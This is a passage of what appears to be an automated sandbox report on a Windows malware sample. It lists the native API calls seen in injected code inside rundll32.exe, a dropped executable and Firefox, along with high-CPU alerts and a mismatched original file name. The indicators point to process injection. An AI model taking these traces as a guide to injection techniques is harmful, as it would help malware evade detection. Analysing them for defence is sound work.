Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A34E0 NtCreateMutant,LdrInitializeThunk, 15_2_043A34E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2C30 NtMapViewOfSection,LdrInitializeThunk, 15_2_043A2C30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2CF0 NtDelayExecution,LdrInitializeThunk, 15_2_043A2CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2D10 NtQuerySystemInformation,LdrInitializeThunk, 15_2_043A2D10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 15_2_043A2DC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2E50 NtCreateSection,LdrInitializeThunk, 15_2_043A2E50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2F00 NtCreateFile,LdrInitializeThunk, 15_2_043A2F00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2FB0 NtSetValueKey,LdrInitializeThunk, 15_2_043A2FB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A29F0 NtReadFile,LdrInitializeThunk, 15_2_043A29F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2A80 NtClose,LdrInitializeThunk, 15_2_043A2A80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2AC0 NtEnumerateValueKey,LdrInitializeThunk, 15_2_043A2AC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2B10 NtAllocateVirtualMemory,LdrInitializeThunk, 15_2_043A2B10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2B00 NtQueryValueKey,LdrInitializeThunk, 15_2_043A2B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2B90 NtFreeVirtualMemory,LdrInitializeThunk, 15_2_043A2B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2B80 NtCreateKey,LdrInitializeThunk, 15_2_043A2B80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2BC0 NtQueryInformationToken,LdrInitializeThunk, 15_2_043A2BC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A4570 NtSuspendThread, 15_2_043A4570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A4260 NtSetContextThread, 15_2_043A4260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A3C30 NtOpenProcessToken, 15_2_043A3C30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2C20 NtSetInformationFile, 15_2_043A2C20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2C10 NtOpenProcess, 15_2_043A2C10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2C50 NtUnmapViewOfSection, 15_2_043A2C50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A3C90 NtOpenThread, 15_2_043A3C90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2CD0 NtEnumerateKey, 15_2_043A2CD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2D50 NtWriteVirtualMemory, 15_2_043A2D50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2DA0 NtReadVirtualMemory, 15_2_043A2DA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2E00 NtQueueApcThread, 15_2_043A2E00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2EB0 NtProtectVirtualMemory, 15_2_043A2EB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2E80 NtCreateProcessEx, 15_2_043A2E80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2ED0 NtResumeThread, 15_2_043A2ED0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2EC0 NtQuerySection, 15_2_043A2EC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2F30 NtOpenDirectoryObject, 15_2_043A2F30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A38D0 NtGetContextThread, 15_2_043A38D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A29D0 NtWaitForSingleObject, 15_2_043A29D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2A10 NtWriteFile, 15_2_043A2A10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2AA0 NtQueryInformationFile, 15_2_043A2AA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2B20 NtQueryInformationProcess, 15_2_043A2B20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_043A2BE0 NtQueryVirtualMemory, 15_2_043A2BE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_004185E0 NtCreateFile, 15_2_004185E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00418690 NtReadFile, 15_2_00418690
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00418710 NtClose, 15_2_00418710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_004187C0 NtAllocateVirtualMemory, 15_2_004187C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0041868D NtReadFile, 15_2_0041868D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0041870A NtClose, 15_2_0041870A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_004187C2 NtAllocateVirtualMemory, 15_2_004187C2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 22_2_022A2AD2 NtSetContextThread, 22_2_022A2AD2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 22_2_022A23E2 NtProtectVirtualMemory, 22_2_022A23E2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 22_2_0229C88B NtAllocateVirtualMemory,LoadLibraryA, 22_2_0229C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 22_2_022A06A2 NtWriteVirtualMemory,LoadLibraryA, 22_2_022A06A2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 22_2_022A322B NtWriteVirtualMemory, 22_2_022A322B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 22_2_0229CE0C NtWriteVirtualMemory,LoadLibraryA, 22_2_0229CE0C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 22_2_022A0754 NtWriteVirtualMemory,LoadLibraryA, 22_2_022A0754
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 25_2_000001BF40004D02 NtCreateFile, 25_2_000001BF40004D02
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 26_2_022A2AD2 NtSetInformationThread, 26_2_022A2AD2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 26_2_022A23E2 NtProtectVirtualMemory, 26_2_022A23E2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 26_2_0229C88B NtAllocateVirtualMemory,LoadLibraryA, 26_2_0229C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 26_2_022A06A2 NtWriteVirtualMemory,LoadLibraryA, 26_2_022A06A2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 26_2_022A322B NtWriteVirtualMemory, 26_2_022A322B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 26_2_0229CE0C NtWriteVirtualMemory,LoadLibraryA, 26_2_0229CE0C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 26_2_022A0754 NtWriteVirtualMemory,LoadLibraryA, 26_2_022A0754
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 27_2_02332AD2 NtResumeThread, 27_2_02332AD2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 27_2_023323E2 NtProtectVirtualMemory, 27_2_023323E2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 27_2_0232C88B NtAllocateVirtualMemory,LoadLibraryA, 27_2_0232C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 27_2_023306A2 NtWriteVirtualMemory,LoadLibraryA, 27_2_023306A2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 27_2_0233322B NtWriteVirtualMemory, 27_2_0233322B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 27_2_0232CE0C NtWriteVirtualMemory,LoadLibraryA, 27_2_0232CE0C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 27_2_02330754 NtWriteVirtualMemory,LoadLibraryA, 27_2_02330754
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 28_2_1EA32DC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32D10 NtQuerySystemInformation,LdrInitializeThunk, 28_2_1EA32D10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32B90 NtFreeVirtualMemory,LdrInitializeThunk, 28_2_1EA32B90
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32B10 NtAllocateVirtualMemory,LdrInitializeThunk, 28_2_1EA32B10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA334E0 NtCreateMutant,LdrInitializeThunk, 28_2_1EA334E0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32EB0 NtProtectVirtualMemory, 28_2_1EA32EB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32E80 NtCreateProcessEx, 28_2_1EA32E80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32EC0 NtQuerySection, 28_2_1EA32EC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32ED0 NtResumeThread, 28_2_1EA32ED0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32E00 NtQueueApcThread, 28_2_1EA32E00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32E50 NtCreateSection, 28_2_1EA32E50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32FB0 NtSetValueKey, 28_2_1EA32FB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32F30 NtOpenDirectoryObject, 28_2_1EA32F30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32F00 NtCreateFile, 28_2_1EA32F00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA33C90 NtOpenThread, 28_2_1EA33C90
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32CF0 NtDelayExecution, 28_2_1EA32CF0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32CD0 NtEnumerateKey, 28_2_1EA32CD0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32C20 NtSetInformationFile, 28_2_1EA32C20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32C30 NtMapViewOfSection, 28_2_1EA32C30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA33C30 NtOpenProcessToken, 28_2_1EA33C30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32C10 NtOpenProcess, 28_2_1EA32C10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32C50 NtUnmapViewOfSection, 28_2_1EA32C50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32DA0 NtReadVirtualMemory, 28_2_1EA32DA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32D50 NtWriteVirtualMemory, 28_2_1EA32D50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32AA0 NtQueryInformationFile, 28_2_1EA32AA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32A80 NtClose, 28_2_1EA32A80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32AC0 NtEnumerateValueKey, 28_2_1EA32AC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32A10 NtWriteFile, 28_2_1EA32A10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32B80 NtCreateKey, 28_2_1EA32B80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32BE0 NtQueryVirtualMemory, 28_2_1EA32BE0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32BC0 NtQueryInformationToken, 28_2_1EA32BC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32B20 NtQueryInformationProcess, 28_2_1EA32B20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA32B00 NtQueryValueKey, 28_2_1EA32B00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA338D0 NtGetContextThread, 28_2_1EA338D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA329F0 NtReadFile, 28_2_1EA329F0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA329D0 NtWaitForSingleObject, 28_2_1EA329D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA34570 NtSuspendThread, 28_2_1EA34570
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_1EA34260 NtSetContextThread, 28_2_1EA34260
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_005723E2 NtProtectVirtualMemory, 28_2_005723E2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_0056C88B NtAllocateVirtualMemory,LoadLibraryA, 28_2_0056C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_00563CE1 NtProtectVirtualMemory, 28_2_00563CE1
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 28_2_00563E0E NtProtectVirtualMemory, 28_2_00563E0E
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 29_2_1E8F2DC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2D10 NtQuerySystemInformation,LdrInitializeThunk, 29_2_1E8F2D10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2B90 NtFreeVirtualMemory,LdrInitializeThunk, 29_2_1E8F2B90
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2B10 NtAllocateVirtualMemory,LdrInitializeThunk, 29_2_1E8F2B10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F34E0 NtCreateMutant,LdrInitializeThunk, 29_2_1E8F34E0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2E80 NtCreateProcessEx, 29_2_1E8F2E80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2EB0 NtProtectVirtualMemory, 29_2_1E8F2EB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2EC0 NtQuerySection, 29_2_1E8F2EC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2ED0 NtResumeThread, 29_2_1E8F2ED0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2E00 NtQueueApcThread, 29_2_1E8F2E00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2E50 NtCreateSection, 29_2_1E8F2E50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2FB0 NtSetValueKey, 29_2_1E8F2FB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2F00 NtCreateFile, 29_2_1E8F2F00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2F30 NtOpenDirectoryObject, 29_2_1E8F2F30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F3C90 NtOpenThread, 29_2_1E8F3C90
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2CD0 NtEnumerateKey, 29_2_1E8F2CD0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2CF0 NtDelayExecution, 29_2_1E8F2CF0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2C10 NtOpenProcess, 29_2_1E8F2C10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2C20 NtSetInformationFile, 29_2_1E8F2C20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F3C30 NtOpenProcessToken, 29_2_1E8F3C30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2C30 NtMapViewOfSection, 29_2_1E8F2C30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2C50 NtUnmapViewOfSection, 29_2_1E8F2C50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2DA0 NtReadVirtualMemory, 29_2_1E8F2DA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2D50 NtWriteVirtualMemory, 29_2_1E8F2D50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2A80 NtClose, 29_2_1E8F2A80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2AA0 NtQueryInformationFile, 29_2_1E8F2AA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2AC0 NtEnumerateValueKey, 29_2_1E8F2AC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2A10 NtWriteFile, 29_2_1E8F2A10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2B80 NtCreateKey, 29_2_1E8F2B80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2BC0 NtQueryInformationToken, 29_2_1E8F2BC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2BE0 NtQueryVirtualMemory, 29_2_1E8F2BE0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2B00 NtQueryValueKey, 29_2_1E8F2B00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F2B20 NtQueryInformationProcess, 29_2_1E8F2B20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F38D0 NtGetContextThread, 29_2_1E8F38D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F29D0 NtWaitForSingleObject, 29_2_1E8F29D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F29F0 NtReadFile, 29_2_1E8F29F0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F4570 NtSuspendThread, 29_2_1E8F4570
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_1E8F4260 NtSetContextThread, 29_2_1E8F4260
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_005723E2 NtProtectVirtualMemory, 29_2_005723E2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_0056C88B NtAllocateVirtualMemory,LoadLibraryA, 29_2_0056C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_00563CE1 NtProtectVirtualMemory, 29_2_00563CE1
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 29_2_00563E0E NtProtectVirtualMemory, 29_2_00563E0E
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 30_2_1E902DC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902D10 NtQuerySystemInformation,LdrInitializeThunk, 30_2_1E902D10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902B90 NtFreeVirtualMemory,LdrInitializeThunk, 30_2_1E902B90
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902B10 NtAllocateVirtualMemory,LdrInitializeThunk, 30_2_1E902B10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E9034E0 NtCreateMutant,LdrInitializeThunk, 30_2_1E9034E0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902E80 NtCreateProcessEx, 30_2_1E902E80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902EB0 NtProtectVirtualMemory, 30_2_1E902EB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902ED0 NtResumeThread, 30_2_1E902ED0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902EC0 NtQuerySection, 30_2_1E902EC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902E00 NtQueueApcThread, 30_2_1E902E00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902E50 NtCreateSection, 30_2_1E902E50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902FB0 NtSetValueKey, 30_2_1E902FB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902F00 NtCreateFile, 30_2_1E902F00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902F30 NtOpenDirectoryObject, 30_2_1E902F30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E903C90 NtOpenThread, 30_2_1E903C90
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902CD0 NtEnumerateKey, 30_2_1E902CD0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902CF0 NtDelayExecution, 30_2_1E902CF0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902C10 NtOpenProcess, 30_2_1E902C10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E903C30 NtOpenProcessToken, 30_2_1E903C30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902C30 NtMapViewOfSection, 30_2_1E902C30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902C20 NtSetInformationFile, 30_2_1E902C20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902C50 NtUnmapViewOfSection, 30_2_1E902C50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902DA0 NtReadVirtualMemory, 30_2_1E902DA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902D50 NtWriteVirtualMemory, 30_2_1E902D50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902A80 NtClose, 30_2_1E902A80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902AA0 NtQueryInformationFile, 30_2_1E902AA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902AC0 NtEnumerateValueKey, 30_2_1E902AC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902A10 NtWriteFile, 30_2_1E902A10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902B80 NtCreateKey, 30_2_1E902B80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902BC0 NtQueryInformationToken, 30_2_1E902BC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902BE0 NtQueryVirtualMemory, 30_2_1E902BE0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902B00 NtQueryValueKey, 30_2_1E902B00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E902B20 NtQueryInformationProcess, 30_2_1E902B20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E9038D0 NtGetContextThread, 30_2_1E9038D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E9029D0 NtWaitForSingleObject, 30_2_1E9029D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E9029F0 NtReadFile, 30_2_1E9029F0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E904570 NtSuspendThread, 30_2_1E904570
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_1E904260 NtSetContextThread, 30_2_1E904260
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_005723E2 NtProtectVirtualMemory, 30_2_005723E2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_0056C88B NtAllocateVirtualMemory,LoadLibraryA, 30_2_0056C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_00563CE1 NtProtectVirtualMemory, 30_2_00563CE1
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Code function: 30_2_00563E0E NtProtectVirtualMemory, 30_2_00563E0E
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Process Stats: CPU usage > 98%
Source: C:\Windows\explorer.exe Process Stats: CPU usage > 98%
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: Zr26f1rL6r.exe, 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUNDERWR.exe vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe, 0000000A.00000000.47306458832.0000000000422000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUNDERWR.exe vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe, 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe, 0000000A.00000003.47933945787.00000000008FF000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe, 0000000A.00000002.47938539485.00000000000DC000.00000040.00020000.sdmp Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe, 0000000A.00000002.47954454517.000000001EB60000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe Binary or memory string: OriginalFilenameUNDERWR.exe vs Zr26f1rL6r.exe
Tries to load missing DLLs
